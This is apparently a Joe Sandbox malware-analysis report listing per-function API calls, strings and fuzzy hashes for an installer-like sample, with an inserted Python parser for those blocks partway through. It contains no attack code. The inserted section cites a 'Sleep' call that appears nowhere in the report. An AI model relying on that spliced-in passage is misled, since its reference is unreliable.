                                                    • API ID: FreeString
                                                    • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                    • API String ID: 3341692771-3153392536
                                                    • Opcode ID: ba4335344f5d5044d57cdb7737467add1c5140dc98ac798bca0b50f887b13af1
                                                    • Instruction ID: 91c6820c9a16087859acfbab60eb4bd2f6ef11847126363c0600937f205040ce
                                                    • Opcode Fuzzy Hash: ba4335344f5d5044d57cdb7737467add1c5140dc98ac798bca0b50f887b13af1
                                                    • Instruction Fuzzy Hash: FF928071D102499BDB25DFA4C884BDEBBB4FF49314F20831DE419BB291EB74A685CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindClose.KERNEL32(00000000), ref: 003712EF
                                                    • PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 003713A7
                                                    • FindFirstFileW.KERNEL32(?,005CFDB8,*.*,00000000), ref: 003714FC
                                                    • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 00371516
                                                    • GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 00371549
                                                    • FindClose.KERNEL32(00000000), ref: 003715B8
                                                    • SetLastError.KERNEL32(0000007B), ref: 003715C6
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0037161C
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0037163C
                                                    • PathIsUNCW.SHLWAPI(*.*,?,D13B3340), ref: 003717D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                    • String ID: *.*$\\?\$\\?\UNC\
                                                    • API String ID: 1241272779-1700010636
                                                    • Opcode ID: acefdbeed2d0f752043f11bf288025a971aaa44a56d83c79754a77e565cda14f
                                                    • Instruction ID: 9f7463f96348cc557ae9d4f1688181ebb1dbbbdf5b568b2d554ffd77eb460c6c
                                                    • Opcode Fuzzy Hash: acefdbeed2d0f752043f11bf288025a971aaa44a56d83c79754a77e565cda14f
                                                    • Instruction Fuzzy Hash: 4E3213726006029FDB25DF6CC848B6AF7F5FF55314F148268E819DB2A1EB79A904CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0036F4D3
                                                    • ShowWindow.USER32(00000000,?), ref: 0036F4F2
                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0036F500
                                                    • GetWindowRect.USER32(00000000,?), ref: 0036F517
                                                    • ShowWindow.USER32(00000000,?), ref: 0036F538
                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0036F54F
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • ShowWindow.USER32(?,?), ref: 0036F68D
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0036F6BC
                                                    • ShowWindow.USER32(?,?), ref: 0036F6D9
                                                    • GetWindowRect.USER32(?,?), ref: 0036F6FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$LongShow$Rect$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 283321994-0
                                                    • Opcode ID: e3aec15c4fcd3fe9a764a4f6d5e8bb5e87dac5cdc4259dd253f8c0e27390c04c
                                                    • Instruction ID: a189bb6665866010d05d386ce4cd5944cf5fb2954160dd50bd5f31eab06e58a0
                                                    • Opcode Fuzzy Hash: e3aec15c4fcd3fe9a764a4f6d5e8bb5e87dac5cdc4259dd253f8c0e27390c04c
                                                    • Instruction Fuzzy Hash: B0425A71A04209DFCB25CFA8E884A9EFBF5FF89304F10856DE849AB265D730A945CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0047F078
                                                    • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 0047F579
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharCopyFileHeapInit_thread_footerMultiWide$AllocateFindProcessResource
                                                    • String ID: 2rT$AI_PRODUCTNAME_ARP$InstanceId$ProductCode$ProductName$\\?\$instname-custom.mst$instname-target.msi${%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}
                                                    • API String ID: 2868415777-4252105220
                                                    • Opcode ID: c1af67046132a0295e59860604d0dc7df94a6a3b9680a6f2a0c97e4e6ea3704b
                                                    • Instruction ID: 5aa1ac316744e08f74f19b39f94f52bd4da3675ab223dd1241f3c12c9c4aa5c9
                                                    • Opcode Fuzzy Hash: c1af67046132a0295e59860604d0dc7df94a6a3b9680a6f2a0c97e4e6ea3704b
                                                    • Instruction Fuzzy Hash: 6CD2A2709006499FDB01DFA9C844BAEBBB5FF45315F148269E809EB392DB38DD09CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 0047AEE2
                                                    • FindClose.KERNEL32(00000000), ref: 0047AF10
                                                    • FindClose.KERNEL32(00000000), ref: 0047AF99
                                                    Strings
                                                    • No acceptable version found. It must be installed from package., xrefs: 0047B489
                                                    • No acceptable version found. It must be downloaded manually from a site., xrefs: 0047B497
                                                    • No acceptable version found., xrefs: 0047B4AC
                                                    • No acceptable version found. Operating System not supported., xrefs: 0047B49E
                                                    • No acceptable version found. It is already downloaded and it will be installed., xrefs: 0047B4A5
                                                    • Not selected for install., xrefs: 0047B4B3
                                                    • No acceptable version found. It must be downloaded., xrefs: 0047B490
                                                    • An acceptable version was found., xrefs: 0047B482
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
                                                    • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                    • API String ID: 544434140-749633484
                                                    • Opcode ID: 4cc924c609c56ef91b8a1850edab00af0e7741ebed5cd53ef26ca4b097e08998
                                                    • Instruction ID: b4f4ada45122da7830d654b99111e6bed4ed2eb1749235f9a6c23b9d2f31f3d4
                                                    • Opcode Fuzzy Hash: 4cc924c609c56ef91b8a1850edab00af0e7741ebed5cd53ef26ca4b097e08998
                                                    • Instruction Fuzzy Hash: 7DF19D309006058FDB61DF28C9487AEFBF2FF85311F148299E8599B392DB349E45DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
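Added example for working with this report (it is not Joe Sandbox code and not part of the analysed sample): a parser for the per-function blocks rendered above, so that the API list, the referenced strings and the Opcode / Instruction fuzzy hashes can be pulled out and pivoted on across other reports. It assumes only the line shapes visible in this section; the embedded sample input is an abridged copy of the prerequisite-check block immediately above, constructed here for the example.

```python
"""Parser for the Joe Sandbox IDA plugin's per-function summaries
(the APIs / Strings / Similarity / Uniqueness blocks in this report).
Added example, not Joe Sandbox code; line shapes are assumed from the
visible blocks, nothing else about the plugin's output is relied on."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# 'Name.MODULE(args), ref: ADDR', optionally prefixed 'Part of subcall function ADDR: '
API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)
STR_RE = re.compile(r"(?P<text>.*), xrefs: (?P<addr>[0-9A-F]{8})$")
# Section headers exactly as the report prints them, and the bucket each feeds.
SECTIONS = {"Strings": "strings", "Memory Dump Source": "meta",
            "Joe Sandbox IDA Plugin": "meta", "Similarity": "meta", "Uniqueness": "meta"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[str]      # None when no argument list was printed
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address for 'Part of subcall function' entries


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    meta: dict = field(default_factory=dict)     # 'Opcode Fuzzy Hash', 'API String ID', ...
    uniqueness: Optional[float] = None

    def list_field(self, key: str) -> list:
        """Split a '$'-separated Similarity value (API ID, String ID) into items."""
        return [s for s in self.meta.get(key, "").split("$") if s]

    def pivot_key(self) -> tuple:
        """Values worth searching for in other reports of the same family."""
        return (self.meta.get("Opcode Fuzzy Hash"),
                self.meta.get("Instruction Fuzzy Hash"),
                self.meta.get("API String ID"))


def parse_blocks(text: str) -> list:
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":            # every function block opens with its API list
            cur, section = FunctionBlock(), "apis"
            blocks.append(cur)
            continue
        if cur is None:
            continue                  # text before the first block
        if line in SECTIONS:
            section = SECTIONS[line]
            continue
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        line = line.lstrip("•").strip()
        if section == "apis":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"], m["ref"], m["sub"]))
        elif section == "strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m["text"], m["addr"]))
        else:                         # dump source / plugin / similarity: 'Key: value'
            key, _, value = line.partition(":")
            cur.meta[key.strip()] = value.strip()
    return blocks


def api_histogram(blocks) -> Counter:
    """Count direct (non-subcall) imports as MODULE!Name across the parsed functions."""
    return Counter(f"{c.module}!{c.name}" for b in blocks for c in b.apis if c.subcall is None)


# Constructed sample: an abridged copy of the prerequisite-check block above,
# with its 'Associated' dump lines and most of its strings dropped.
SAMPLE = """
APIs
  • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
• FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 0047AEE2
• FindClose.KERNEL32(00000000), ref: 0047AF10
• FindClose.KERNEL32(00000000), ref: 0047AF99
Strings
• No acceptable version found. It must be installed from package., xrefs: 0047B489
• An acceptable version was found., xrefs: 0047B482
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
• String ID: An acceptable version was found.$No acceptable version found.
• API String ID: 544434140-749633484
• Opcode Fuzzy Hash: 4cc924c609c56ef91b8a1850edab00af0e7741ebed5cd53ef26ca4b097e08998
• Instruction Fuzzy Hash: 7DF19D309006058FDB61DF28C9487AEFBF2FF85311F148299E8599B392DB349E45DB92
Uniqueness

Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(api_histogram([b]), b.pivot_key(), b.list_field("String ID"))
```

Feed it the text of the whole "Joe Sandbox IDA Plugin" section rather than the abridged sample to get one record per function; the fuzzy hashes and the API String ID are the fields to search for in other reports, since they survive rebuilds of the installer stub better than any single call-site address does. Argument lists are kept verbatim (the plugin prints `?` for values it could not resolve), so a parenthesis inside an unresolved argument, as in the `Sleep` call further up, does not break the match.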

                                                    APIs
                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0037E311
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • __Init_thread_footer.LIBCMT ref: 0037E2CE
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 0037E832
                                                    • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 0037E8E0
                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 0037E981
                                                      • Part of subcall function 00462170: __cftof.LIBCMT ref: 004621C0
                                                    • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0037EB09
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
                                                    • String ID: AiFeatIco$Icon$dc$dc
                                                    • API String ID: 2303580663-3304960293
                                                    • Opcode ID: 1fa88f84a6658af1c9bcf66b08169fedc738b7abe763608ca9facc6a76273549
                                                    • Instruction ID: 202aff70ef72078e95af9bc37db9379e81a9d348f652cd0e78ae005d9c9832cb
                                                    • Opcode Fuzzy Hash: 1fa88f84a6658af1c9bcf66b08169fedc738b7abe763608ca9facc6a76273549
                                                    • Instruction Fuzzy Hash: 31528A71900658CFDB25DF68CC88BDDBBB1BB89304F1081D9E44AAB291DB746E84CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00472B4D
                                                    • __Init_thread_footer.LIBCMT ref: 00472CEC
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • GetStdHandle.KERNEL32(000000F5,?,D13B3340,?,?), ref: 00472D74
                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00472D7B
                                                    • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00472D8F
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00472D96
                                                    • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,005B5F2C,00000002,?,?), ref: 00472E25
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00472E2C
                                                    • IsWindow.USER32(00000000), ref: 004730BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
                                                    • String ID: Error
                                                    • API String ID: 2811146417-2619118453
                                                    • Opcode ID: 049b539cec61647f2529dea4980240341bccb71ea28eb1d32091f684da429e1a
                                                    • Instruction ID: 85c84bdf4d8adbfbaf14904d22ce72196b5c3414f1eb2e652ed81f4dce60a246
                                                    • Opcode Fuzzy Hash: 049b539cec61647f2529dea4980240341bccb71ea28eb1d32091f684da429e1a
                                                    • Instruction Fuzzy Hash: 02426B71D00259CFDB20CFA4C945BDEBBB1BF55314F24829AE419BB291DBB46A84CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 0050686D
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00506874
                                                    • GetSystemInfo.KERNEL32(?), ref: 005068F5
                                                    • GetModuleHandleA.KERNEL32 ref: 00506944
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0050694B
                                                    • GlobalMemoryStatus.KERNEL32 ref: 0050699B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                    • API String ID: 3120231856-802862622
                                                    • Opcode ID: 66731918d294f25df512c8bcbafed8b08a6c671a42f6836d2ad8c1f540d4008e
                                                    • Instruction ID: f466130f18767b89e8575a1f4ae55ff9a6e8e8ae9abd23d709de32f2717853b0
                                                    • Opcode Fuzzy Hash: 66731918d294f25df512c8bcbafed8b08a6c671a42f6836d2ad8c1f540d4008e
                                                    • Instruction Fuzzy Hash: C8715CB1A083118FD708CF59D89475ABBE5BFC8714F05892DE899C7391D774D908CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode$Xd[$Xd[$Xd[
                                                    • API String ID: 0-4062129066
                                                    • Opcode ID: 0bc466b1994118b330732fd5cfd365b9a4b70c39bcb5f37c7abfa2c79fc33cc3
                                                    • Instruction ID: 8a5d5898888d1417c3dede12c16faef25690dc52ff22b12347dbbbda571a9668
                                                    • Opcode Fuzzy Hash: 0bc466b1994118b330732fd5cfd365b9a4b70c39bcb5f37c7abfa2c79fc33cc3
                                                    • Instruction Fuzzy Hash: 5D62E431D00259CBDF15CB64CC54BEEBBB5BF45304F248299D40ABB291DB786B85CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(80070216,000000EC), ref: 0036508B
                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0036509B
                                                    • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 003650A6
                                                    • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,80070216,?,?,80070216), ref: 003650B4
                                                    • GetWindowLongW.USER32(00000000,000000EB), ref: 003650C2
                                                    • SetWindowTextW.USER32(00000000,005B329C), ref: 00365161
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00365196
                                                    • GlobalLock.KERNEL32 ref: 003651A4
                                                    • GlobalUnlock.KERNEL32(?), ref: 003651F8
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0036525D
                                                    • NtdllDefWindowProc_W.NTDLL(00000000,00000000,D13B3340,00000000), ref: 003652AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                    • String ID:
                                                    • API String ID: 3555041256-0
                                                    • Opcode ID: 463de8541502243dd76fe68c1a4a8b5d0bfbc04b57ffc60a5f26a99c82f0656f
                                                    • Instruction ID: 0b629d7368383baf8979127e7dc8556b055cf4c32d0119254f91a4e0d32e2510
                                                    • Opcode Fuzzy Hash: 463de8541502243dd76fe68c1a4a8b5d0bfbc04b57ffc60a5f26a99c82f0656f
                                                    • Instruction Fuzzy Hash: BFE1E271A006069FDB12DF68DC48B6FBBB9FF45310F158628E911EB295EB34D900CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003884FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$Lt[$SpawnDialog$Title$`Dialog_`='
                                                    • API String ID: 3850602802-3629213097
                                                    • Opcode ID: 3d8039334a75835f3164f2529f3883793e7b2d2e12b8987a33e5aef5f6746597
                                                    • Instruction ID: 2a93b5c7558982aefaf0281c1889a25e6f8d58abac347a49bc4a3458e0874588
                                                    • Opcode Fuzzy Hash: 3d8039334a75835f3164f2529f3883793e7b2d2e12b8987a33e5aef5f6746597
                                                    • Instruction Fuzzy Hash: A172D271D00258DFDB15DFA8C844BDDBBB1FF58304F648299E505BB291DB34AA85CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
